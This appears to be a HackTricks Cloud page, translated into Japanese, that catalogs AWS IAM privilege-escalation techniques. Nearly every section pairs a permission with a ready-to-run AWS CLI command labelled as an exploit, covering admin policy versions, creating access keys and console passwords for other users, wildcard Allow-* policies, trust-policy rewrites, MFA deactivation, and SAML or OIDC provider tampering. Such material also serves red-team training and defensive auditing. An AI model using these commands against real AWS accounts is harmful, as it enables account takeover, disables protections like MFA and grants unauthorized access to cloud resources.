AWS - IAM Privesc

htARTE（HackTricks AWS Red Team Expert） でAWSハッキングをゼロからヒーローまで学びましょう！

HackTricks をサポートする他の方法:

HackTricks で企業を宣伝したい または HackTricks をPDFでダウンロードしたい 場合は SUBSCRIPTION PLANS をチェックしてください！
公式PEASS＆HackTricksスウォッグを入手する
The PEASS Family を発見し、独占的な NFTs のコレクションを見つける
💬 Discordグループ に参加するか、telegramグループに参加するか、Twitter 🐦 @hacktricks_live をフォローしてください。
ハッキングトリックを共有するために HackTricks と HackTricks Cloud のGitHubリポジトリにPRを提出してください。

IAM

IAMに関する詳細情報は以下をチェックしてください:

pageAWS - IAM, Identity Center & SSO Enum

`iam:CreatePolicyVersion`

新しいIAMポリシーバージョンを作成する権限を付与し、iam:SetDefaultPolicyVersion 権限が不要になるように --set-as-default フラグを使用します。これにより、カスタム権限を定義できます。

Exploit Command:

aws iam create-policy-version --policy-arn <target_policy_arn> \
--policy-document file:///path/to/administrator/policy.json --set-as-default

影響: 任意のリソースで任意のアクションを許可することで特権を直接昇格させます。

`iam:SetDefaultPolicyVersion`

IAMポリシーのデフォルトバージョンを別の既存バージョンに変更することを許可し、新しいバージョンにより多くの権限がある場合、特権を昇格させる可能性があります。

Bashコマンド:

aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2

影響: より多くの権限を有効にすることで間接的な特権昇格が発生します。

`iam:CreateAccessKey`

別のユーザーのためにアクセスキーIDとシークレットアクセスキーを作成できるようになり、潜在的な特権昇格が発生します。

攻撃:

aws iam create-access-key --user-name <target_user>

影響: 他のユーザーの拡張権限を仮定することによる直接的な特権昇格。

`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`

ログインプロファイルの作成または更新を許可し、AWSコンソールログインのパスワードを設定することができ、直接的な特権昇格につながります。

作成のためのエクスプロイト:

aws iam create-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

アップデートの悪用:

aws iam update-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

影響: 「任意の」ユーザーとしてログインすることによる直接的な特権昇格。

`iam:UpdateAccessKey`

無効化されたアクセスキーを有効にすることを許可し、攻撃者が無効化されたキーを所有している場合には権限のないアクセスにつながる可能性があります。

攻撃手法:

aws iam update-access-key --access-key-id <ACCESS_KEY_ID> --status Active --user-name <username>

影響: アクセスキーを再アクティブ化することで直接特権昇格が可能。

`iam:CreateServiceSpecificCredential` | `iam:ResetServiceSpecificCredential`

特定のAWSサービス（例：CodeCommit、Amazon Keyspaces）の資格情報を生成またはリセットし、関連するユーザーの権限を継承することができます。

作成のためのエクスプロイト:

aws iam create-service-specific-credential --user-name <username> --service-name <service>

リセットのためのエクスプロイト:

aws iam reset-service-specific-credential --service-specific-credential-id <credential_id>

影響: ユーザーのサービス権限内での直接的な特権昇格。

`iam:AttachUserPolicy` || `iam:AttachGroupPolicy`

ユーザーまたはグループにポリシーを添付することを許可し、添付されたポリシーの権限を継承することで特権を直接昇格させることができます。

ユーザー向けエクスプロイト:

aws iam attach-user-policy --user-name <username> --policy-arn "<policy_arn>"

グループ用のエクスプロイト:

aws iam attach-group-policy --group-name <group_name> --policy-arn "<policy_arn>"

影響: ポリシーが許可するすべてに対する直接的な特権昇格。

`iam:AttachRolePolicy`, ( `sts:AssumeRole`|`iam:createrole`) | `iam:PutUserPolicy` | `iam:PutGroupPolicy` | `iam:PutRolePolicy`

ロール、ユーザー、またはグループにポリシーを添付または設定することを許可し、追加の権限を付与することで直接的な特権昇格を可能にします。

ロールへの悪用:

bashCopy codeaws iam attach-role-policy --role-name <role_name> --policy-arn "<policy_arn>"

インラインポリシーの悪用:

aws iam put-user-policy --user-name <username> --policy-name "<policy_name>" \
--policy-document "file:///path/to/policy.json"

aws iam put-group-policy --group-name <group_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

aws iam put-role-policy --role-name <role_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

次のようなポリシーを使用できます：

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": [
"*"
]
}
]
}

影響: ポリシーを介して権限を追加することによる直接的な特権昇格。

`iam:AddUserToGroup`

IAMグループに自分自身を追加し、グループの権限を継承することで特権を昇格させることができます。

Exploit:

aws iam add-user-to-group --group-name <group_name> --user-name <username>

影響: グループの権限レベルへの直接的な特権昇格。

`iam:UpdateAssumeRolePolicy`

ロールのアサムロールポリシードキュメントを変更し、そのロールと関連する権限を前提とすることを可能にします。

攻撃:

aws iam update-assume-role-policy --role-name <role_name> \
--policy-document file:///path/to/assume/role/policy.json

以下のようなポリシーがある場合、ユーザーにロールを前提とする権限が与えられます：

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "sts:AssumeRole",
"Principal": {
"AWS": "$USER_ARN"
}
}
]
}

影響: 任意のロールの権限を仮定した直接的な特権昇格。

`iam:UploadSSHPublicKey` || `iam:DeactivateMFADevice`

CodeCommitへの認証用のSSH公開鍵のアップロードとMFAデバイスの無効化を許可し、潜在的な間接的な特権昇格を引き起こす。

SSHキーのアップロードの悪用:

aws iam upload-ssh-public-key --user-name <username> --ssh-public-key-body <key_body>

MFA解除のためのエクスプロイト:

aws iam deactivate-mfa-device --user-name <username> --serial-number <serial_number>

影響: CodeCommitアクセスの有効化またはMFA保護の無効化による間接的な特権昇格。

`iam:ResyncMFADevice`

MFAデバイスの再同期を許可し、MFA保護を操作することで間接的な特権昇格が可能になります。

Bashコマンド:

aws iam resync-mfa-device --user-name <username> --serial-number <serial_number> \
--authentication-code1 <code1> --authentication-code2 <code2>

影響: MFA デバイスの追加や操作による間接的な特権昇格。

`iam:UpdateSAMLProvider`, `iam:ListSAMLProviders`, (`iam:GetSAMLProvider`)

これらの権限を持つと、SAML 接続の XML メタデータを変更できます。その後、SAML フェデレーションを悪用して、それを信頼している任意のロールでログインできます。

これを行うと、正規のユーザーはログインできなくなります。ただし、XML を取得して自分のものを置き、ログインして前の設定を戻すことができます。

# List SAMLs
aws iam list-saml-providers

# Optional: Get SAML provider XML
aws iam get-saml-provider --saml-provider-arn <ARN>

# Update SAML provider
aws iam update-saml-provider --saml-metadata-document <value> --saml-provider-arn <arn>

## Login impersonating roles that trust the SAML provider

# Optional: Set the previous XML back
aws iam update-saml-provider --saml-metadata-document <previous-xml> --saml-provider-arn <arn>

TODO: 指定されたロールで SAML メタデータを生成し、ログインできるツール

`iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:GetOpenIDConnectProvider`)

(これについては不確かです) 攻撃者がこれらの権限を持っている場合、新しいThumbprintを追加してプロバイダを信頼するすべてのロールにログインできるようにすることができます。

# List providers
aws iam list-open-id-connect-providers
# Optional: Get Thumbprints used to not delete them
aws iam get-open-id-connect-provider --open-id-connect-provider-arn <ARN>
# Update Thumbprints (The thumbprint is always a 40-character string)
aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn <ARN> --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3

参考文献

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

htARTE（HackTricks AWS Red Team Expert） を通じて、ゼロからヒーローまでAWSハッキングを学ぶ！

HackTricks をサポートする他の方法:

HackTricks で企業を宣伝したい または HackTricks をPDFでダウンロードしたい場合は SUBSCRIPTION PLANS をチェックしてください！
公式PEASS＆HackTricksスワッグを入手する
The PEASS Family、当社の独占的な NFTs コレクションを発見する
💬 Discordグループ に参加するか、telegramグループ に参加するか、Twitter 🐦 @hacktricks_live をフォローする
HackTricks および HackTricks Cloud の github リポジトリに PR を提出して、あなたのハッキングトリックを共有する

前へAWS - Glue Privesc 次へAWS - KMS Privesc

最終更新 3 か月前

IAM

iam:CreatePolicyVersion

iam:SetDefaultPolicyVersion

iam:CreateAccessKey

iam:CreateLoginProfile | iam:UpdateLoginProfile

iam:UpdateAccessKey

iam:CreateServiceSpecificCredential | iam:ResetServiceSpecificCredential

iam:AttachUserPolicy || iam:AttachGroupPolicy

iam:AttachRolePolicy, ( sts:AssumeRole|iam:createrole) | iam:PutUserPolicy | iam:PutGroupPolicy | iam:PutRolePolicy

iam:AddUserToGroup

iam:UpdateAssumeRolePolicy

iam:UploadSSHPublicKey || iam:DeactivateMFADevice

iam:ResyncMFADevice

iam:UpdateSAMLProvider, iam:ListSAMLProviders, (iam:GetSAMLProvider)

iam:UpdateOpenIDConnectProviderThumbprint, iam:ListOpenIDConnectProviders, (iam:GetOpenIDConnectProvider)